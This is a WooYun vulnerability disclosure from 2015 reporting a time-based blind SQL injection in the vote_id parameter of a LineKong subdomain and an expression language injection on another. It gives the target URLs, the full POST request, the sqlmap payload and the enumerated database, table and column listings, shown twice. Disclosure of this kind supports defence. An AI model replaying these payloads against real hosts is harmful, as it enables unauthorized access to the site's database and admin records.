当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126333

漏洞标题:蓝港在线某子站SQL注入

相关厂商:linekong.com

漏洞作者: Ysql404

提交时间:2015-07-13 12:06

修复时间:2015-07-18 12:08

公开时间:2015-07-18 12:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蓝港在线某子站基于时间的盲注;另一子站存在Expression language injection

详细说明:

1、漏洞地址:http://yt.linekong.com/lottery/panda/vote_xml.php

POST /lottery/panda/vote_xml.php?timeStame=1436664476447n9198 HTTP/1.1
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://yt.linekong.com/
Host: yt.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
voteOption=6139&vote_id=80


参数:vote_id存在注入

POST parameter 'vote_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 3692 HTTP(s) requests:
---
Place: POST
Parameter: vote_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'
---
[14:30:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb


Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge |
| DEPARTMENT |
| Service |
| TBLTRANSACTIONS |
| admin_login |
| administer |
| administration |
| administrator |
| agent |
| akhbar |
| apartments |
| app_user |
| banned_users |
| binn_cform |
| cell_line |
| control |
| cv_countries |
| dtb_bat_order_daily_age |
| ipblocks |
| keyboards |
| nuke_autonews |
| spip_index_dico |
+-------------------------+


Database: yt_wgb
Table: admin_login
[60 columns]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| caroline-du-nord | numeric |
| adminemail | numeric |
| arch | numeric |
| area | numeric |
| attributecategory_id | numeric |
| ava_disciplina | numeric |
| bb_id | numeric |
| bijouxn | numeric |
| bio | numeric |
| bloc_id | numeric |
| cachename | numeric |
| child_cfg | numeric |
| clientno | numeric |
| de | numeric |
| desd_xforo | numeric |
| fichier | non-numeric |
| fldfunhref | numeric |
| fldfunid | numeric |
| fldfunmemo | numeric |
| fldfunname | numeric |
| former | numeric |
| id_article | numeric |
| id_breve | numeric |
| id_forum | numeric |
| id_message | numeric |
| id_page | numeric |
| id_rubrique | numeric |
| id_syndic | numeric |
| idmedicofamiglia | numeric |
| inv_id | numeric |
| job_title | numeric |
| k_id | numeric |
| lastposttime | numeric |
| liste | numeric |
| main_comment | numeric |
| medalid | numeric |
| mm | numeric |
| module_code | numeric |
| motto | numeric |
| nroordine | numeric |
| nt_id | numeric |
| our_loc | numeric |
| parent_id | numeric |
| payid | numeric |
| pluginhookid | numeric |
| pluginid | numeric |
| press | numeric |
| product_list | numeric |
| propertyno | numeric |
| publisher | numeric |
| recherche | numeric |
| subdivision_name | numeric |
| summaprihod | numeric |
| ticker | numeric |
| title_id | numeric |
| titre | numeric |
| totfasciaeuroid | numeric |
| utilisateurs | numeric |
| website | numeric |
| xfase | numeric |
+----------------------+-------------+


Database: yt_wgb
Table: administrator
[13 columns]
+----------------+---------+
| Column | Type |
+----------------+---------+
| group | numeric |
| account_number | numeric |
| codigo | numeric |
| essn | numeric |
| gab_pergunta | numeric |
| jml | numeric |
| maty_id | numeric |
| pass | numeric |
| user_pass | numeric |
| userid | numeric |
| utilizzatore | numeric |
| word | numeric |
| xprognostico | numeric |
+----------------+---------+


Database: yt_wgb
Table: app_user
[50 columns]
+-------------------------+---------+
| Column | Type |
+-------------------------+---------+
| am_id | numeric |
| an | numeric |
| at_id | numeric |
| ba_num_reads | numeric |
| bfs_id | numeric |
| blogcommentsaccess | numeric |
| blogcommentssub | numeric |
| bml_id | numeric |
| bms_cat_id | numeric |
| bs_setting | numeric |
| campo_bol | numeric |
| codeid | numeric |
| contacts | numeric |
| cost_id | numeric |
| dis_codigo | numeric |
| distip | numeric |
| field3 | numeric |
| fjalekalimin | numeric |
| gmail | numeric |
| grfilt | numeric |
| hdesc | numeric |
| id_photo | numeric |
| idclassificatore | numeric |
| idgroup | numeric |
| manufacturer | numeric |
| message | numeric |
| mod_date | numeric |
| mod_flipper_img_rotator | numeric |
| mod_jt_slideshow | numeric |
| noteaccettazione | numeric |
| nrcandi | numeric |
| ostdate | numeric |
| pasword | numeric |
| perid | numeric |
| prepend_digits | numeric |
| progetto | numeric |
| prz_merce | numeric |
| sb_pwd | numeric |
| sd | numeric |
| sender | numeric |
| sklad | numeric |
| smilie_id | numeric |
| solicitante_id | numeric |
| t1 | numeric |
| t2 | numeric |
| tanggal | numeric |
| tenquanly | numeric |
| term_id | numeric |
| top | numeric |
| us_id | numeric |
+-------------------------+---------+


2、http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
参数gameMainId存在Expression language injection,可造成敏感信息泄漏,之前提交过未完全修复;
具体见: WooYun: 蓝港在线某子站Expression language injection及远程命令执行漏洞

漏洞证明:

available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb


Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge |
| DEPARTMENT |
| Service |
| TBLTRANSACTIONS |
| admin_login |
| administer |
| administration |
| administrator |
| agent |
| akhbar |
| apartments |
| app_user |
| banned_users |
| binn_cform |
| cell_line |
| control |
| cv_countries |
| dtb_bat_order_daily_age |
| ipblocks |
| keyboards |
| nuke_autonews |
| spip_index_dico |
+-------------------------+


Database: yt_wgb
Table: admin_login
[60 columns]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| caroline-du-nord | numeric |
| adminemail | numeric |
| arch | numeric |
| area | numeric |
| attributecategory_id | numeric |
| ava_disciplina | numeric |
| bb_id | numeric |
| bijouxn | numeric |
| bio | numeric |
| bloc_id | numeric |
| cachename | numeric |
| child_cfg | numeric |
| clientno | numeric |
| de | numeric |
| desd_xforo | numeric |
| fichier | non-numeric |
| fldfunhref | numeric |
| fldfunid | numeric |
| fldfunmemo | numeric |
| fldfunname | numeric |
| former | numeric |
| id_article | numeric |
| id_breve | numeric |
| id_forum | numeric |
| id_message | numeric |
| id_page | numeric |
| id_rubrique | numeric |
| id_syndic | numeric |
| idmedicofamiglia | numeric |
| inv_id | numeric |
| job_title | numeric |
| k_id | numeric |
| lastposttime | numeric |
| liste | numeric |
| main_comment | numeric |
| medalid | numeric |
| mm | numeric |
| module_code | numeric |
| motto | numeric |
| nroordine | numeric |
| nt_id | numeric |
| our_loc | numeric |
| parent_id | numeric |
| payid | numeric |
| pluginhookid | numeric |
| pluginid | numeric |
| press | numeric |
| product_list | numeric |
| propertyno | numeric |
| publisher | numeric |
| recherche | numeric |
| subdivision_name | numeric |
| summaprihod | numeric |
| ticker | numeric |
| title_id | numeric |
| titre | numeric |
| totfasciaeuroid | numeric |
| utilisateurs | numeric |
| website | numeric |
| xfase | numeric |
+----------------------+-------------+


Database: yt_wgb
Table: administrator
[13 columns]
+----------------+---------+
| Column | Type |
+----------------+---------+
| group | numeric |
| account_number | numeric |
| codigo | numeric |
| essn | numeric |
| gab_pergunta | numeric |
| jml | numeric |
| maty_id | numeric |
| pass | numeric |
| user_pass | numeric |
| userid | numeric |
| utilizzatore | numeric |
| word | numeric |
| xprognostico | numeric |
+----------------+---------+


Database: yt_wgb
Table: app_user
[50 columns]
+-------------------------+---------+
| Column | Type |
+-------------------------+---------+
| am_id | numeric |
| an | numeric |
| at_id | numeric |
| ba_num_reads | numeric |
| bfs_id | numeric |
| blogcommentsaccess | numeric |
| blogcommentssub | numeric |
| bml_id | numeric |
| bms_cat_id | numeric |
| bs_setting | numeric |
| campo_bol | numeric |
| codeid | numeric |
| contacts | numeric |
| cost_id | numeric |
| dis_codigo | numeric |
| distip | numeric |
| field3 | numeric |
| fjalekalimin | numeric |
| gmail | numeric |
| grfilt | numeric |
| hdesc | numeric |
| id_photo | numeric |
| idclassificatore | numeric |
| idgroup | numeric |
| manufacturer | numeric |
| message | numeric |
| mod_date | numeric |
| mod_flipper_img_rotator | numeric |
| mod_jt_slideshow | numeric |
| noteaccettazione | numeric |
| nrcandi | numeric |
| ostdate | numeric |
| pasword | numeric |
| perid | numeric |
| prepend_digits | numeric |
| progetto | numeric |
| prz_merce | numeric |
| sb_pwd | numeric |
| sd | numeric |
| sender | numeric |
| sklad | numeric |
| smilie_id | numeric |
| solicitante_id | numeric |
| t1 | numeric |
| t2 | numeric |
| tanggal | numeric |
| tenquanly | numeric |
| term_id | numeric |
| top | numeric |
| us_id | numeric |
+-------------------------+---------+


2、http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
参数gameMainId存在Expression language injection,可造成敏感信息泄漏,之前提交过未完全修复;
具体见: WooYun: 蓝港在线某子站Expression language injection及远程命令执行漏洞

修复方案:

数据跑起来太慢了未继续测试;

版权声明:转载请注明来源 Ysql404@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-18 12:08

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无